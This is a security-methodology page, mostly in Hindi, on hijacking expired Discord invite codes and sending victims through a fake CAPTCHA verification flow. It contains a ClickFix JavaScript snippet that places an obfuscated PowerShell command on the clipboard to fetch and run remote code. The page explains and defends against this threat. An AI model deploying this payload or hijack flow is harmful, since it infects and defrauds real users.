hacktricks/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md

Discord Invite Hijacking

{{#include ../../banners/hacktricks-training.md}}

Discord के आमंत्रण प्रणाली की कमजोरी खतरे के तत्वों को समाप्त या हटाए गए आमंत्रण कोड (अस्थायी, स्थायी, या कस्टम वैनिटी) को किसी भी स्तर 3 बूस्टेड सर्वर पर नए वैनिटी लिंक के रूप में दावा करने की अनुमति देती है। सभी कोड को लोअरकेस में सामान्यीकृत करके, हमलावर ज्ञात आमंत्रण कोड को पूर्व-रजिस्टर कर सकते हैं और मूल लिंक समाप्त होने या स्रोत सर्वर के बूस्ट खोने पर चुपचाप ट्रैफ़िक को हाईजैक कर सकते हैं।

Invite Types and Hijack Risk

Invite Type	Hijackable?	Condition / Comments
Temporary Invite Link	✅	समाप्ति के बाद, कोड उपलब्ध हो जाता है और इसे एक बूस्टेड सर्वर द्वारा वैनिटी URL के रूप में फिर से रजिस्टर किया जा सकता है।
Permanent Invite Link	⚠️	यदि हटाया गया और केवल लोअरकेस अक्षरों और अंकों से बना है, तो कोड फिर से उपलब्ध हो सकता है।
Custom Vanity Link	✅	यदि मूल सर्वर अपना स्तर 3 बूस्ट खो देता है, तो इसका वैनिटी आमंत्रण नए रजिस्ट्रेशन के लिए उपलब्ध हो जाता है।

Exploitation Steps

1. Reconnaissance

• सार्वजनिक स्रोतों (फोरम, सोशल मीडिया, टेलीग्राम चैनल) पर आमंत्रण लिंक की निगरानी करें जो पैटर्न discord.gg/{code} या discord.com/invite/{code} से मेल खाते हैं।
• रुचि के आमंत्रण कोड (अस्थायी या वैनिटी) एकत्र करें।

2. Pre-registration

• स्तर 3 बूस्ट विशेषाधिकार के साथ एक नया या मौजूदा Discord सर्वर बनाएं या उपयोग करें।
• Server Settings → Vanity URL में, लक्षित आमंत्रण कोड को असाइन करने का प्रयास करें। यदि स्वीकार किया जाता है, तो कोड दुर्भावनापूर्ण सर्वर द्वारा आरक्षित है।

3. Hijack Activation

• अस्थायी आमंत्रण के लिए, मूल आमंत्रण समाप्त होने की प्रतीक्षा करें (या यदि आप स्रोत को नियंत्रित करते हैं तो इसे मैन्युअल रूप से हटा दें)।
• बड़े अक्षरों वाले कोड के लिए, लोअरकेस संस्करण को तुरंत दावा किया जा सकता है, हालांकि रीडायरेक्शन केवल समाप्ति के बाद सक्रिय होता है।

4. Silent Redirection

• पुराने लिंक पर जाने वाले उपयोगकर्ताओं को हमलावर-नियंत्रित सर्वर पर बिना किसी रुकावट के भेजा जाता है जब हाईजैक सक्रिय होता है।

Phishing Flow via Discord Server

1. सर्वर चैनलों को इस तरह से सीमित करें कि केवल #verify चैनल दिखाई दे।
2. नए उपयोगकर्ताओं को OAuth2 के माध्यम से सत्यापित करने के लिए प्रेरित करने के लिए एक बॉट (जैसे, Safeguard#0786) तैनात करें।
3. बॉट उपयोगकर्ताओं को एक फ़िशिंग साइट (जैसे, captchaguard.me) पर रीडायरेक्ट करता है जो CAPTCHA या सत्यापन चरण के रूप में प्रकट होती है।
4. ClickFix UX ट्रिक लागू करें:

• एक टूटी हुई CAPTCHA संदेश प्रदर्शित करें।
• उपयोगकर्ताओं को Win+R संवाद खोलने, एक प्रीलोडेड PowerShell कमांड पेस्ट करने और Enter दबाने के लिए मार्गदर्शन करें।

ClickFix Clipboard Injection Example

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

इस दृष्टिकोण से सीधे फ़ाइल डाउनलोड से बचा जाता है और उपयोगकर्ता की संदेह को कम करने के लिए परिचित UI तत्वों का लाभ उठाया जाता है।

Mitigations

• स्थायी आमंत्रण लिंक का उपयोग करें जिसमें कम से कम एक बड़ा अक्षर या गैर-अक्षरांकित चरित्र हो (कभी समाप्त न हों, पुन: उपयोग करने योग्य न हों)।
• नियमित रूप से आमंत्रण कोड को घुमाएँ और पुराने लिंक को रद्द करें।
• Discord सर्वर बूस्ट स्थिति और वैनिटी URL दावों की निगरानी करें।
• उपयोगकर्ताओं को सर्वर की प्रामाणिकता की पुष्टि करने और क्लिपबोर्ड-पेस्ट किए गए कमांड को निष्पादित करने से बचने के लिए शिक्षित करें।

References

• From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
• Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link

{{#include ../../banners/hacktricks-training.md}}